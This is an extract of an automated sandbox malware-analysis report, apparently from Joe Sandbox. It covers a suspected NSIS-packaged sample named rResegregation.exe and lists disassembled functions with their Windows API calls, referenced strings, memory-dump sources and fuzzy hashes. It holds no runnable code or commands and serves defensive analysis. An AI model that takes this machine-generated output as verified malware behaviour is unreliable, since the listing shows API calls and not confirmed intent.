                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B07
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
                                                                  • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BB5
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC
                                                                    • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                    • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                  • API String ID: 222337774-4148678300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\rResegregation.exe",76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                  • CharPrevA.USER32(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F78
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 00405FB3
                                                                  • *?|<>/":, xrefs: 00405FBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-1087672714
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F75
                                                                  • GetSysColor.USER32(00000000), ref: 00403F91
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403F9D
                                                                  • SetBkMode.GDI32(?,?), ref: 00403FA9
                                                                  • GetSysColor.USER32(?), ref: 00403FBC
                                                                  • SetBkColor.GDI32(?,?), ref: 00403FCC
                                                                  • DeleteObject.GDI32(?), ref: 00403FE6
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403FF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 3730416702-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
                                                                  • GetMessagePos.USER32 ref: 00404813
                                                                  • ScreenToClient.USER32(?,?), ref: 0040482D
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                  • Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                  • Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                  • MulDiv.KERNEL32(000D5E8B,00000064,000D7B88), ref: 00402BC5
                                                                  • wsprintfA.USER32 ref: 00402BD5
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402BCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                  • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                  • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                  • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00032C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 4409c9af0e4a5f9d89842a68b2d3119a8129694f240a68dc73fb08f0ed421e3f
                                                                  • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                  • Opcode Fuzzy Hash: 4409c9af0e4a5f9d89842a68b2d3119a8129694f240a68dc73fb08f0ed421e3f
                                                                  • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                  • wsprintfA.USER32 ref: 0040478C
                                                                  • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$@y
                                                                  • API String ID: 3540041739-3020698753
                                                                  • Opcode ID: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
                                                                  • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                  • Opcode Fuzzy Hash: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
                                                                  • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
                                                                  • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                  • Opcode Fuzzy Hash: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
                                                                  • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D3B
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                  • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
                                                                  • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                  • Opcode Fuzzy Hash: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
                                                                  • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowTextA.USER32(00000000,Bortdmmer Setup), ref: 004039E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$1033$Bortdmmer Setup
                                                                  • API String ID: 530164218-3200382464
                                                                  • Opcode ID: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
                                                                  • Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
                                                                  • Opcode Fuzzy Hash: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
                                                                  • Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Bortdmmer Setup,NSIS Error), ref: 00405D19
                                                                    • Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                  • lstrlenA.KERNEL32(Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058BF
                                                                  • GetFileAttributesA.KERNEL32(Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\), ref: 004058CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$Mundstykket.min
                                                                  • API String ID: 3248276644-3047242854
                                                                  • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                  • Instruction ID: 819bf3b96d2f33be72422b420245a44e5a303c51be7f34a106cb995fc7f4ae7e
                                                                  • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                  • Instruction Fuzzy Hash: B7F0CD27115D5119E61632361C05ABF1A58CE82364718C53FFC51F22D1EA3C8862DD7E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405784
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040578D
                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 0040579E
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3355392842
                                                                  • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                  • Instruction ID: 68e0f27090206f37803ec84d28e37c7f09ebc5753c251fe5cd2e9e8878fbe2c1
                                                                  • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                  • Instruction Fuzzy Hash: 44D0A972606A307AE2022A15AC09E8F2A08CF62301B044433F200B22A2C63C4E418BFE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                  • CharNextA.USER32(00000000), ref: 0040582A
                                                                  • CharNextA.USER32(00000000), ref: 0040583E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: Mundstykket.min
                                                                  • API String ID: 3213498283-3661976162
                                                                  • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                  • Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
                                                                  • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                  • Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                  • Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
                                                                  • Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                  • Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                    • Part of subcall function 00403F3D: SendMessageA.USER32(000103C0,00000000,00000000,00000000), ref: 00403F4F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                  • Instruction ID: 1c3aa9a2031039442b6cd3bdc360fce63fd7b644e996c38402bdeea248e73ffc
                                                                  • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                  • Instruction Fuzzy Hash: 2D0171B1104249AFDF219F51DC80A5B3A25E7C4755F104037FB00762D1D33AAD619B6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,76483410,00000000,C:\Users\user\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
                                                                  • GlobalFree.KERNEL32(00C2CAE8), ref: 00403618
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004035F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-3355392842
                                                                  • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                  • Instruction ID: f0c2977cb20e6558c2e773556eb83bc0584892ec035bd6653f77e23ad75a478d
                                                                  • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                  • Instruction Fuzzy Hash: 1DE0C233905120ABC6315F44FE0472A7B7CAF48B22F020067EC447B3A087786C528BCC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 004057CB
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 004057D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-3370423016
                                                                  • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                  • Instruction ID: d39d8f188df628cf061828239c0557f0f3bbaa41193ad9941d070ee56f497fe5
                                                                  • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                  • Instruction Fuzzy Hash: E5D0A772408D706EF30352109C04B8F6A48CF26300F090463F040A3191C27C5D424BBE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                  • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmp
